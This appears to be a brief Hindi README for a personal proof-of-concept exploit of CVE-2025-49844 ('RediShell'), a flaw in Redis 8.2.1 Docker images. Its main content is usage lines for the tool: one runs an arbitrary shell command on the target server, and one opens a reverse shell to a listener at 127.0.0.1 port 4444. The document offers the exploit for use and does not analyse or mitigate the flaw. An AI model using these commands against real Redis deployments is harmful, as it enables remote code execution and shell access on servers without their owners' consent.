
CVE-2025-49844 के लिए प्रमाण की अवधारणा
मेरा व्यक्तिगत प्रूफ-ऑफ-कॉन्सेप्ट CVE-2025-49844 के लिए, जिसे RediShell के नाम से भी जाना जाता है।
समर्थित लक्ष्य बिल्ड:
redis:8.2.1-alpine Docker इमेजredis:8.2.1-bookworm Docker इमेजयह थोड़ा बेढंगा है, शायद Wiz Research के जितना अच्छा नहीं है। फिर भी, मुझे खुशी है कि मैं Hexacon 2025 की बातचीत अपलोड होने से पहले इसे काम करने में सफल रहा, और इसकी जाँच करने में मुझे बहुत मज़ा आया।
एक-तरफ़ा शेल कमांड चलाएँ:
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"
रिवर्स शेल से कनेक्ट करें:
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444